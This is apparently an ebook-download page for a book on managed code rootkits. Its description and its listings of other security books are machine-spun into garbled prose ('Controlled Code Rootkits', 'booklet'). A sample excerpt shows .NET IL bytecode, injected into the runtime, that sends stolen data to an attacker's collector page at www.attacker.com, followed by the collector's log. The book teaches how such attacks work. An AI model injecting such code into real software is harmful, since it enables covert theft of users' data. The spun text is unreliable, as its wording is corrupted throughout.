Managed Code Rootkits: Hooking into Runtime Environments

By Erez Metula

Controlled Code Rootkits is the 1st booklet to hide application-level rootkits and different forms of malware contained in the program VM, which runs a platform-independent programming setting for tactics. The publication, divided into 4 components, issues out high-level assaults, that are constructed in intermediate language.
The preliminary a part of the e-book bargains an summary of controlled code rootkits. It explores setting types of controlled code and the connection of controlled code to rootkits via learning how they use program VMs. It additionally discusses attackers of controlled code rootkits and numerous assault situations. the second one a part of the booklet covers the advance of controlled code rootkits, beginning with the instruments utilized in generating controlled code rootkits via their deployment.
The subsequent half makes a speciality of countermeasures that may almost certainly be used opposed to controlled code rootkits, together with technical suggestions, prevention, detection, and reaction strategies. The ebook concludes via offering suggestions which are by some means just like controlled code rootkits, which might be utilized in fixing problems.

  • Named a 2011 most sensible Hacking and Pen trying out e-book by means of InfoSec Reviews
  • Introduces the reader in brief to controlled code environments and rootkits in general
  • Completely info a brand new kind of rootkit hiding within the program point and demonstrates how a hacker can switch language runtime implementation
  • Focuses on controlled code together with Java, .NET, Android Dalvik and stories malware improvement scanarios

Show description

Quick preview of Managed Code Rootkits: Hooking into Runtime Environments PDF

Best Security books

Cyber War: The Next Threat to National Security and What to Do About It

Writer of the number 1 ny instances bestseller opposed to All Enemies, former presidential consultant and counter-terrorism professional Richard A. Clarke sounds a well timed and chilling caution approximately America’s vulnerability in a terrifying new overseas conflict—Cyber conflict! each involved American may still learn this startling and explosive publication that gives an insider’s view of White condominium ‘Situation Room’ operations and incorporates the reader to the frontlines of our cyber safety.

Hacking Exposed: Network Security Secrets and Solutions, Sixth Edition

The world's bestselling desktop safety book--fully elevated and updated"Right now you carry on your hand the most winning defense books ever written. instead of being a sideline player, leverage the dear insights Hacking uncovered 6 presents to assist your self, your organization, and your kingdom struggle cyber-crime.

Information Security: The Complete Reference, Second Edition

Advance and enforce an efficient end-to-end safety software Today’s advanced global of cellular systems, cloud computing, and ubiquitous info entry places new defense calls for on each IT specialist. details defense: the whole Reference, moment version (previously titled community safeguard: the full Reference) is the single accomplished ebook that provides vendor-neutral info on all elements of data security, with an eye fixed towards the evolving chance panorama.

Gray Hat Hacking The Ethical Hacker's Handbook, Fourth Edition

State of the art recommendations for locating and solving severe protection flaws toughen your community and sidestep electronic disaster with confirmed thoughts from a workforce of safeguard specialists. thoroughly up-to-date and that includes 12 new chapters, grey Hat Hacking: the moral Hacker's guide, Fourth variation explains the enemy’s present guns, abilities, and strategies and gives field-tested treatments, case reviews, and ready-to-deploy trying out labs.

Additional info for Managed Code Rootkits: Hooking into Runtime Environments

Show sample text content

Collector pages equivalent to this are frequently utilized by attackers to gather stolen details akin to credentials, consultation IDs, and such while using phishing or XSS assaults. Now that the attacker has organize a web page situated at http:///DataStealer/ acquire. aspx that collects details despatched from distant machines, he can concentrate on the victim’s laptop. the assumption is to strength the sufferer to factor an HTTP request as follows: situated at http:///DataStealer/Collect. aspx? data=StolenData through appending the information the attacker desires to ship (StolenData during this instance) to the URL, the attacker can ship the knowledge to his desktop. we'd like a few invoker code that might create an HTTP request to the collector web page. the subsequent . web IL bytecode, injected into the runtime, will just do that: ldstr "http:///DataStealer/Collect. aspx\? data=StolenData" name type [System]System. internet. WebRequest [System]System. internet. WebRequest::Create(string) callvirt example classification [System]System. web. WebResponse [System]System. web. WebRequest::GetResponse() pop Let’s move over that code. the very first thing the code does is to claim the URL to which the request may be despatched, together with the request parameters. during this instance, we used an HTTP GET request (which is the default request technique whilst utilizing the WebRequest class), surroundings the request objective to http:///DataStealer/Â�Collect. aspx? data=StolenData. the information we’re sending during this instance, the StolenData string, is concatenated to the URL and the entire string is driven into the stack as a parameter for the Create strategy. this technique, positioned within the WebRequest category, is serving as an item manufacturing facility that determines the kind of item to create and initializes a brand new WebRequest example. Following that, we’re calling the GetResponse strategy that triggers the sending of the request, and shops the reaction at the stack (as a WebResponse object). during this instance, we have been basically within the request itself; consequently, the bought reaction is cleared from the stack with a pop guideline. 117 118 bankruptcy 5╇ Manipulating the Â�Runtime Executing the previous code on the victim’s desktop will strength it to factor an HTTP request to the attacker’s web page that would create the next checklist on the distant computing device, contained in the enter. dat dossier: New enter has arrived: ******************************************************* question: data=Stolendata distant tackle: 192. 168. 50. 1 distant port: 4436 Cookies: HTTP Headers: HTTP_CONNECTION:Keep-Alive HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/xaml+xml, application/vnd. ms-xpsdocument, program/ x-ms-xbap, application/x-ms-application, */* HTTP_ACCEPT_ENCODING:gzip, deflate HTTP_ACCEPT_LANGUAGE:he HTTP_HOST:www. attacker. com HTTP_USER_AGENT:Mozilla/4. zero (compatible; MSIE 6. zero; home windows NT five. 1; SV1; GTB6. four; . internet CLR 1. 1. 4322; . internet CLR 2. zero. 50727; . internet CLR three. zero.

Download PDF sample

Rated 4.24 of 5 – based on 22 votes